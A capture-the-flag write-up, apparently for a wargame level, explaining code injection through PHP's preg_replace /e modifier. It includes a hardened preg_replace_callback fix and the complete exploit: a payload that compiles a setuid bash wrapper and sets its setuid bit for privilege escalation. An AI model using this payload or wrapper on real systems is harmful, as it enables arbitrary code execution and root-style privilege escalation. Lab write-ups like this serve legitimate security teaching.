The challenge provides the following PHP code:
<?php
function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);
    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

$output = markup($argv[1], $argv[2]);
print $output;
?>
If the input matches the regular expression form [email (.*)], the @ in the captured text is replaced with AT and each . with dot.
The vulnerability is that this regular expression uses the /e modifier: with /e set, PHP substitutes the backreferences into the replacement string and then evaluates the result as PHP code, so content read from the input file ends up being executed.
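For contrast, here is a hardened version of markup() that performs the same substitution without /e; the captured address reaches spam() only as a string argument, so file contents are never evaluated. This is an added example, not code from the challenge: markup_safe() and the two constructed inputs are mine, and the example assumes PHP 5.3 or later for the closure (the /e modifier itself was deprecated in PHP 5.5 and removed in 7.0).

```php
<?php
// Added example: the original spam() helper, unchanged.
function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

// Hardened replacement for markup(): preg_replace_callback hands the
// captured text to a PHP function as data, so there is no eval step.
function markup_safe($contents)
{
    $contents = preg_replace_callback(
        "/\[email (.*)\]/",
        function ($m) {
            // $m[1] is the captured address; it is only ever a string here.
            return spam($m[1]);
        },
        $contents
    );
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

// Constructed inputs (not from the challenge): a normal tag, and text in
// the same {${`...`}} shape as the writeup's payload.
$benign  = '[email user@example.com]';
$hostile = '[email "{${`id`}}"]';

print markup_safe($benign) . "\n";   // user AT example dot com
print markup_safe($hostile) . "\n";  // "{${`id`}}" printed verbatim; the
                                     // backtick expression is never evaluated
?>
```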
As before, create the following program in the /home/level09 directory:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
    system("/bin/bash");
}
Then create the input file in.txt with the following contents:
[email "{${`gcc -o /home/flag09/level09 /home/level09/level09.c;chmod +s /home/flag09/level09`}}"]
Run the program:
/home/flag09/flag09 /home/level09/in.txt
This produces the level09 executable in the /home/flag09 directory; running it completes the level.